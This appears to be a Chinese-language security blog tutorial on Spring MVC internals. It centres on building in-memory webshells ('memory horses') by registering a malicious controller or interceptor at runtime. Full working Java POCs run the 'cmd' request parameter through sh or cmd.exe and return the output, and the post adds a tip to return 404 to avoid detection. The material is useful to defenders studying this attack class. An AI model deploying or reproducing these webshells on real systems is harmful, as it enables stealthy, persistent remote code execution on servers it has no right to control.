Spring是IOC和AOP的容器框架,SpringMVC则是基于Spring功能的Web框架。
IOC容器:IOC容器负责实例化、定位、配置应用程序对象及建立对象依赖。Spring中用BeanFactory实现
Spring作为Java框架,核心组件有三个:Core、Context、Bean。其中context又叫IOC容器;Bean构成应用程序主干,Bean就是对象,由IOC容器统一管理;Core为处理对象间关系的方法
依赖注入:把有依赖关系的类放到容器中,解析出这些类的实例
spring对象间的依赖关系可以用配置文件的<bean>定义。context的顶级父类ApplicationContext继承了BeanFactory。
内存马一般的构造方式就是模拟组件注册,注入恶意组件
springMVC环境搭建
新建maven项目,项目名右键添加web框架
配置tomcat:设置tomcat主目录以及Application context路径
pom.xml里加入sping MVC5.3.21以及其他依赖
<dependencies> <!-- SpringMVC --> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-webmvc</artifactId> <version>5.3.21</version> </dependency> <!-- 日志 --> <dependency> <groupId>ch.qos.logback</groupId> <artifactId>logback-classic</artifactId> <version>1.2.3</version> </dependency> <!-- ServletAPI --> <dependency> <groupId>javax.servlet</groupId> <artifactId>javax.servlet-api</artifactId> <version>3.1.0</version> <scope>provided</scope> </dependency> <!-- Spring5和Thymeleaf整合包 --> <dependency> <groupId>org.thymeleaf</groupId> <artifactId>thymeleaf-spring5</artifactId> <version>3.0.12.RELEASE</version> </dependency> </dependencies>
在web.xml中添加DispatcherServlet。DispatcherServlet的主要作用将web请求,根据配置的URL pattern,将请求分发给Controller和View。
<servlet> <servlet-name>DispatcherServlet</servlet-name> <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class> <init-param> <param-name>contextConfigLocation</param-name> <param-value>classpath:SpringMVC.xml</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> <servlet-mapping> <servlet-name>DispatcherServlet</servlet-name> <url-pattern>/</url-pattern> </servlet-mapping> <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener>
在classpath,我这里是src/main/resources下创建SpringMVC.xml核心配置文件
创建TestController类:
package org.example.springmvc; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; @Controller public class TestController { @RequestMapping("/index") public String index(){ return "index"; } }
修改SpringMVC.xml。这里sping会自动扫描base-package下的java文件,如果文件中有@Service,@Component,@Repository,@Controller等这些注解的类,则把这些类注册为bean
属性use-default-filters=”false”表示不要使用默认的过滤器
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:context="http://www.springframework.org/schema/context" xmlns:mvc="http://www.springframework.org/schema/mvc" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc-4.3.xsd"> <mvc:annotation-driven/> <context:component-scan base-package="org.example.springmvc" /> <bean class="org.springframework.web.servlet.view.InternalResourceViewResolver"> <property name="prefix"> <value>/WEB-INF/</value> </property> <property name="suffix"> <value>.jsp</value> </property> </bean> </beans>
prefix表示路径,suffix指定后缀
在WEB-INF下创建lib目录,将可用库全部拖进去
当访问index时,返回index,根据SpringMVC.xml配置的prefix,去/WEB-INF/下寻找jsp后缀的文件。
比如在/WEB-INF/下存放index.jsp,访问index时会通过web.xml中导入的DispatcherServlet处理请求,DispatcherServlet发送到Controller注解类,也就是TestController# return index。然后由springMVC视图解析器去/WEB-INF/下寻找index且为jsp后缀的文件。
其实如果嫌配置麻烦,可以直接使用springboot。然后直接写Controller
<parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.4.5</version> <relativePath/> <!-- lookup parent from repository --> </parent>
基础知识
controller
Controller负责处理DispatcherServlet分发的请求。将用户请求处理后封装成model返回给view。
在springmvc中用@Controller标记一个类为Controller。然后用@RequestMapping等来定义URL请求和Controller方法间的映射
ApplicationContext
org.springframework.context.ApplicationContext接口代表了IoC容器,该接口继承了BeanFactory接口。
ContextLoaderListener
用来初始化全局唯一的Root Context,也就是Root WebApplicationContext.该WebApplicationContext和其他子Context共享IOC容器,共享bean
访问和操作bean就需要获得当前环境ApplicationContext
源码分析
在Controller类打上断点,然后访问index
Controller的注册
在DoDispatch处由DispatcherServlet处理web请求
在DispatcherServlet调用HandlerAdapter#handle处理request和response。并且此处用getHandler方法获取了mappedHandler的Handler
往上看,mappedHandler是对handlerMappings进行遍历。
持续跟进mapping.getHandler(request)发现,AbstractHandlerMethodMapping#getHandlerInternal()中对mappingRegistry进行上锁,最后解锁。(不自觉想起了死锁)mappingRegistry存储了路由信息。
在lookupHandlerMethod方法,从mappingRegistry中获取了路由
也就是说模拟注册向mappingRegistry中添加内存马路由,就能注入内存马。
在AbstractHandlerMethodMapping中就提供了registryMapping添加路由。但是该类为抽象类。它的子类RequestMappingHandlerMapping能进行实例化
RequestMappingHandlerMapping分析
AbstractHandlerMethodMapping的afterProperties用于bean初始化
initHandlerMethod()遍历所有bean传入processCandidateBean处理bean,也就是controller
在processCandidateBean中,getType获取bean类型,通过isHandler进行类型判断,如果bean有controller或RequestMapping注解,就进入detectHandlerMethods解析bean
在detectHandlerMethods中,用getMappingForMethod创建RequestMappingInfo
处理完后用registryHandlerMethod建立方法到RequestyMappingInfo的映射。也就是注册路由
mappingRegistry路由信息
registry传入的参数mapping,handler,method。mapping存储了方法映射的URL路径。handler为controller对象。method为反射获取的方法
Controller内存马构造
1.获取WebApplicationContext
在内存马的构造中,都会获取容器的context对象。在Tomcat中获取的是StandardContext,spring中获取的是WebApplicationContext。(在controller类声明处打上断点可以看到初始化WebApplicationContext的过程)WebApplicationContext继承了BeanFactory,所以能用getBean直接获取RequestMappingHandlerMapping,进而注册路由。
所以重点是如何获取WebApplicationContext
原理:
获取WebApplicationContext:
由于webApplicationContext对象存放于servletContext中。并且键值为
WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE所以可以直接用servletContext#getAttribute()获取属性值
WebApplicationContext wac = (WebApplicationContext)servletContext.getAttribute(WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE);
webApplicationContextUtils提供了下面两种方法获取webApplicationContext。需要传入servletContext
WebApplicationContextUtils.getRequeiredWebApplicationContext(ServletContext s); WebApplicationContextUtils.getWebApplicationContext(ServletContext s);
spring 5的WebApplicationContextUtils已经没有getWebApplicationContext方法
获取ServletContext
通过request对象或者ContextLoader获取ServletContext
// 1 ServletContext servletContext = request.getServletContext(); // 2 ServletContext servletContext = ContextLoader.getCurrentWebApplicationContext().getServletContext();
获取request可以用RequestContextHolder
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder .getRequestAttributes()).getRequest();
spring中获取context的方式一般有以下几种
①直接通过ContextLoader获取,不用再经过servletContext。不过ContextLoader一般会被ban
WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();
②通过RequestContextHolder获取request,然后获取servletRequest后通过RequestContextUtils得到WebApplicationContext
WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
③用RequestContextHolder直接从键值org.springframework.web.servlet.DispatcherServlet.CONTEXT中获取Context
WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
④直接反射获取WebApplicationContext
java.lang.reflect.Field filed = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts"); filed.setAccessible(true); org.springframework.web.context.WebApplicationContext context =(org.springframework.web.context.WebApplicationContext) ((java.util.LinkedHashSet)filed.get(null)).iterator().next();
实际上常用的就2,3。
其中1获取的是Root WebApplicationContext,2,3通过RequestContextUtils获取的是叫dispatcherServlet-servlet的Child WebApplicationContext。
在有些Spring 应用逻辑比较简单的情况下,可能没有配置
ContextLoaderListener、也没有类似applicationContext.xml的全局配置文件,只有简单的servlet配置文件,这时候通过1方法是获取不到Root WebApplicationContext的。
2.模拟注册Controller
在spring2.5-3.1使用DefaultAnnotationHandlerMapping处理URL映射。spring3.1以后使用RequestMappingHandlerMapping
模拟注册Controller的方式一般有三种:
①源码分析就介绍的,registryMapping直接注册requestMapping
直接通过getBean就能获取RequestMappingHandlerMapping
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
生成RequestMappingInfo。需要传入PatternsRequestCondition(Controller映射的URL)和RequestMethodsRequestCondition(HTTP请求方法)
PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller"); RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition(); RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
恶意Controller:
@RestController public class InjectedController { public InjectedController(){ } public void cmd() throws Exception { HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse(); if (request.getParameter("cmd") != null) { boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); response.getWriter().close(); } }
反射获取shell方法
Method method = InjectedController.class.getMethod("cmd");
调用ReqgistryMapping注册
requestMappingHandlerMapping.registerMapping(info, injectedController, method);
测试:
- 完整代码
package org.example.springmvc; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import org.springframework.web.bind.annotation.RestController; import org.springframework.web.context.WebApplicationContext; import org.springframework.web.context.request.RequestContextHolder; import org.springframework.web.context.request.ServletRequestAttributes; import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition; import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition; import org.springframework.web.servlet.mvc.method.RequestMappingInfo; import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.lang.reflect.Method; import java.util.Scanner; @RestController public class InjectController { @RequestMapping("/inject") public String inject() throws Exception{ WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0); RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class); Method method = InjectedController.class.getMethod("cmd"); PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller"); RequestMethodsRequestCondition condition = new RequestMethodsRequestCondition(); RequestMappingInfo info = new RequestMappingInfo(url, condition, null, null, null, null, null); InjectedController injectedController = new InjectedController(); requestMappingHandlerMapping.registerMapping(info, injectedController, method); return "Inject done"; } @RestController public class InjectedController { public InjectedController(){ } public void cmd() throws Exception { HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse(); if (request.getParameter("cmd") != null) { boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); response.getWriter().close(); } } } }
先访问Inject进行controller注册。然后访问controller映射路径evilcontroller,带上参数就能RCE
除此以外,还有两种方式能模拟注册Controller
②detectHandlerMethods直接注册
上面指出:在detectHandlerMethods中,用getMappingForMethod创建RequestMappingInfo
该方法接收handler参数,就能寻找到bean并注册controller
//1.在当前上下文环境中注册一个名为 dynamicController 的 Webshell controller 实例 bean context.getBeanFactory().registerSingleton("dynamicController", Class.forName("org.example.springmvc.InjectedController").newInstance()); // 2. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.class); // 3. 反射获得 detectHandlerMethods Method java.lang.reflect.Method m1 = org.springframework.web.servlet.handler.AbstractHandlerMethodMapping.class.getDeclaredMethod("detectHandlerMethods", Object.class); m1.setAccessible(true); //4.将 dynamicController 注册到 handlerMap 中 m1.invoke(requestMappingHandlerMapping, "dynamicController");
③利用registerHandler
上面的方法适用于spring3.1后RequestMappingHandlerMapping为映射器。当用DefaultAnnotationHandlerMapping为映射器时。该类顶层父类的registerHandler接收urlPath参数和handler参数来注册controller。不过不常用了,贴一下利用方法:
// 1. 在当前上下文环境中注册一个名为 dynamicController 的 Webshell controller 实例 bean context.getBeanFactory().registerSingleton("dynamicController", Class.forName("org.example.springmvc.InjectedController").newInstance()); // 2. 从当前上下文环境中获得 DefaultAnnotationHandlerMapping 的实例 bean org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping dh = context.getBean(org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping.class); // 3. 反射获得 registerHandler Method java.lang.reflect.Method m1 = org.springframework.web.servlet.handler.AbstractUrlHandlerMapping.class.getDeclaredMethod("registerHandler", String.class, Object.class); m1.setAccessible(true); // 4. 将 dynamicController 和 URL 注册到 handlerMap 中 m1.invoke(dh, "/favicon", "dynamicController");
还可以加个else不带参数时返回404状态码,减少被检测到的概率
Interceptor拦截器内存马构造
Interceptor和Tomcat和Filter过滤器很类似。区别如下:
- Interceptor基于反射,Filter基于函数回调
- Interceptor不依赖servlet容器
- Interceptor只能对action请求有用
- Interceptor可以访问action上下文,栈里的对象。Filter不能
- action生命周期中,Interceptor可以被多次调用,Filter只在容器初始化时调用一次
- Interceptor可以获取IOC容器中的bean,Filter不行
由以上区别,Interceptor的应用和过滤器也就不同,Interceptor用来做日志记录,过滤器用来过滤非法操作
源码分析
DispatcherServlet.doDispatch中,进行了getHandler,持续跟进发现最终调用的是AbstractHandlerMapping#getHandler(),该方法中调用了getHandlerExecutionChain()
该方法从adaptedInterceptors中把符合的拦截器添加到chain里。adaptedInterceptors就存放了全部拦截器
返回到DispatcherServlet#doDispatch(),getHandler后执行了applyPreHandle遍历执行了拦截器。
而且可以看到applyPreHandle后面就是ha.handle(),执行controller,所以说Interceptors是在controller之前执行的
师傅给出了Filter,controller,Interceptors执行的顺序:
- preHandle( ):该方法在控制器的处理请求方法前执行,其返回值表示是否中断后续操作,返回 true 表示继续向下执行,返回 false 表示中断后续操作。
- postHandle( ):该方法在控制器的处理请求方法调用之后、解析视图之前执行,可以通过此方法对请求域中的模型和视图做进一步的修改。
- afterCompletion( ):该方法在控制器的处理请求方法执行完成后执行,即视图渲染结束后执行,可以通过此方法实现一些资源清理、记录日志信息等工作。
1. 获取RequestMappingHandlerMapping
因为是在AbstractHandlerMapping类中,用addInterceptor向拦截器chain中添加的。该类是抽象类,可以获取其实现类RequestMappingHandlerMapping。一样的,前面提了四种方法。
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0); RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
2.反射获取adaptedInterceptors
获取adaptedInterceptors,private属性,使用反射。并且传入RequestMappingHandlerMapping初始化
Field field = null; try { field = RequestMappingHandlerMapping.class.getDeclaredField("adaptedInterceptors"); } catch (NoSuchFieldException e) { e.printStackTrace(); } field.setAccessible(true); List<HandlerInterceptor> adaptInterceptors = null; try { adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping); } catch (IllegalAccessException e) { e.printStackTrace(); }
3.添加恶意Interceptors
adaptInterceptors.add(new InjectEvilInterceptor("a"));
恶意Interceptor:需要实现HandlerInterceptor接口,通过重写preHandle进行RCE
public class InjectInterceptor implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { if (request.getParameter("cmd") != null) { try{ boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); response.getWriter().close(); } catch (Exception e) { e.printStackTrace(); } return false; } return true; } @Override public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception { HandlerInterceptor.super.postHandle(request, response, handler, modelAndView); } @Override public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception { HandlerInterceptor.super.afterCompletion(request, response, handler, ex); } }
测试:
过滤器和controller可以直接使用@RequestMapping注解进行URL映射。拦截器Interceptor需要手动编写一个Config添加进去,或者直接修改配置文件spingmvc.xml
<mvc:interceptors> <mvc:interceptor> <mvc:mapping path="/**"/> <bean class="org.example.InjectInterceptor"></bean> </mvc:interceptor> </mvc:interceptors>
POC:
package org.example.springmvc; import org.springframework.web.context.WebApplicationContext; import org.springframework.web.context.request.RequestContextHolder; import org.springframework.web.servlet.HandlerInterceptor; import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.handler.AbstractHandlerMapping; import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.InputStream; import java.lang.reflect.Field; import java.util.List; import java.util.Scanner; public class InjectInterceptor implements HandlerInterceptor { static { WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0); RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class); Field field = null; try { field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors"); } catch (NoSuchFieldException e) { e.printStackTrace(); } field.setAccessible(true); List<HandlerInterceptor> adaptInterceptors = null; try { adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping); } catch (IllegalAccessException e) { e.printStackTrace(); } InjectInterceptor evilInterceptor = new InjectInterceptor(); adaptInterceptors.add(evilInterceptor); } @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { if (request.getParameter("cmd") != null) { try{ boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")) { isLinux = false; } String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; response.getWriter().write(output); response.getWriter().flush(); response.getWriter().close(); } catch (Exception e) { e.printStackTrace(); } return false; } return true; } @Override public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception { HandlerInterceptor.super.postHandle(request, response, handler, modelAndView); } @Override public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception { HandlerInterceptor.super.afterCompletion(request, response, handler, ex); } }
新建一个controller触发拦截器,作为入口
package org.example.springmvc; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @Controller @RequestMapping("/InjectInterceptor") public class EvilController { @GetMapping public void index(HttpServletRequest request, HttpServletResponse response) { try { Class.forName("org.example.springmvc.InjectInterceptor"); response.getWriter().println("Inject done!"); } catch (Exception e) { e.printStackTrace(); } } }
参考:https://ho1aas.blog.csdn.net/article/details/123943546
如有侵权请联系:admin#unsafe.sh